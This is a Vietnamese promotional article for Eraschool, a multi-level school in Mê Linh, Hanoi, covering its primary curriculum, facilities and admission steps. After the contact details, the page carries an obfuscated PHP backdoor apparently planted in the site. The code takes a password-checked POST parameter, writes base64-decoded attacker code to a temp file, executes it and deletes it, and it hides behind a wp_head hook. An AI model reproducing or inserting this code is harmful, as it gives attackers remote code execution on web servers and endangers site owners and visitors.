Tiểu học chất lượng cao trong mô hình trường liên cấp Mê Linh

1/5 - (1 bình chọn)

Với những gia đình có điều kiện, việc cho con theo học tiểu học chất lượng cao để con được tiếp cận môi trường giáo dục tiên tiến nhất, phù hợp nhất không phải là điều khó khăn. Tuy nhiên, liệu ba mẹ đã thực sự hiểu rõ nội dung chương trình chất lượng cao là gì và được thể hiện ở đâu? Ba mẹ hãy dành thời gian tìm hiểu về chương trình của Eraschool để có cái nhìn tổng quan và “bỏ túi” thêm một sự lựa chọn cho con nhé! 

Tiểu học chất lượng cao là gì?

Học sinh Eraschool được học các kỹ năng cần thiết khi đi cắm trại 
Học sinh Eraschool được học các kỹ năng cần thiết khi đi cắm trại

Tiểu học chất lượng cao được hiểu là chương trình xây dựng dành riêng cho học sinh tiểu học với mục tiêu nhằm giúp các em có nền tảng vững chắc cả về kiến thức và kỹ năng phục vụ cho các bậc học cao hơn. Thông thường, chương trình chất lượng cao ghi điểm với ba mẹ bởi khả năng giúp học sinh chuẩn bị cho môi trường học tập trong nước và quốc tế, trở thành một công dân toàn cầu. Sự chuẩn bị này không chỉ giúp trẻ dễ thích ứng hơn với môi trường nhiều biến động mà còn mở rộng cơ hội nghề nghiệp tương lai cho các con trong bối cảnh hội nhập quốc tế. Để lựa chọn chương trình tiểu học chất lượng cao phù hợp cho con, ba mẹ có thể căn cứ vào 3 yếu tố chính gồm môi trường học tập, đội ngũ giáo viên và nội dung chương trình học. 

Chất lượng tiểu học của Eraschool được thể hiện ở đâu?

Các em học sinh luôn được thỏa sức sáng tạo tại trường 
Các em học sinh luôn được thỏa sức sáng tạo tại trường

Eraschool được xây dựng theo mô hình trường học liên cấp từ tiền tiểu học đến tiểu học và trung học cơ sở. Trong đó, chất lượng chương trình tiểu học chất lượng cao được thể hiện rất rõ qua 3 yếu tố gồm triết lý giáo dục, cơ sở vật chất và chương trình đào tạo. 

  • Triết lý giáo dục 

Triết lý giáo dục của trường tiểu học sinh thái Eraschool tập trung vào 2 nội dung: tự học – tự giáo dục và tự làm ra chính mình. Tại đây, nhà trường quan niệm giáo dục là tổ chức sự trưởng thành cho trẻ. Theo đó, trẻ không chỉ được học kiến thức mà còn được học nhiều kỹ năng cần thiết, đặc biệt là kỹ năng tự học. 

  • Cơ sở vật chất 

Với khuôn viên rộng hơn 20,000 m2, Eraschool chia phạm vi học tập của trẻ thành nhiều khu tương ứng với từng hoạt động học tập cụ thể. Một số khu vực tiêu biểu gồm công viên khoa học, khu hoạt động ngoài trời (hồ cá, vườn hồng, bể bơi, sân bóng, vườn vật lý thiên văn), khu hoạt động trong nhà (xưởng mộc, xưởng gốm, phòng thí nghiệm vật lý – sinh học – hóa học,…) và khu hoạt động tập thể. 

  • Chương trình đào tạo 

Hiện nay Eraschool đang triển khai đồng thời 2 hệ đào tạo là hệ song ngữ và hệ quốc tế để đảm bảo phù hợp với mục đích học tập của từng nhóm học sinh. Cả 2 hệ đều sử dụng chương trình Cambridge tiểu học đảm bảo về chất lượng. Ngoài ra, các em cũng sẽ được trải nghiệm nhiều chương trình đặc biệt như chương trình phát triển ngôn ngữ ưu việt, chương trình giáo dục sinh thái và chương trình phát triển cá nhân được thiết kế dành riêng cho học sinh của trường. 

Cách thức đăng ký tuyển sinh vào các cấp học của Eraschool

Eraschool dạy trẻ kỹ năng làm việc nhóm thông qua nhiều hoạt động bổ ích 
Eraschool dạy trẻ kỹ năng làm việc nhóm thông qua nhiều hoạt động bổ ích

Năm học 2022 – 2023, Eraschool tiếp tục mở tuyển sinh ở cả 3 cấp học gồm Tiền tiểu học, Tiểu học và Trung học cơ sở. Trong đó, lớp tiền tiểu học sẽ khai giảng vào đầu tháng 8 tới. Đối với khối Tiểu học và Trung học cơ sở, ba mẹ cần đảm bảo con đáp ứng các yêu cầu về đối tượng và điều kiện nhập học trước khi tiến hành các bước trong quy trình tuyển sinh của trường. 

Để đăng ký tuyển sinh cho con vào các cấp học của Eraschool, ba mẹ thực hiện theo 3 bước sau: 

  • Bước 1. Dự tuyển. 

Ba mẹ đăng ký dự tuyển theo 1 trong 2 hình thức là trực tuyến hoặc trực tiếp, sau đó nộp phí và nhận lịch hẹn đánh giá năng lực cho học sinh. 

  • Bước 2. Đánh giá năng lực. 

Ba mẹ cho con tham gia buổi đánh giá năng lực đúng lịch hẹn. Kết quả sẽ được trả về sau 2-3 ngày làm việc. 

  • Bước 3. Nhập học. 

Sau khi nhận thư báo trúng tuyển, ba mẹ chuẩn bị hồ sơ nhập học cho con và nộp các khoản phí theo quy định để hoàn thiện thủ tục. 

Trên đây là một số thông tin về chương trình tiểu học chất lượng cao ở Eraschool cũng như quy trình tuyển sinh vào trường. Nếu còn bất cứ thắc mắc nào cần giải đáp, ba mẹ vui lòng liên hệ trực tiếp tới hotline 0899.889.818 để được tư vấn và hỗ trợ trong thời gian sớm nhất! 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}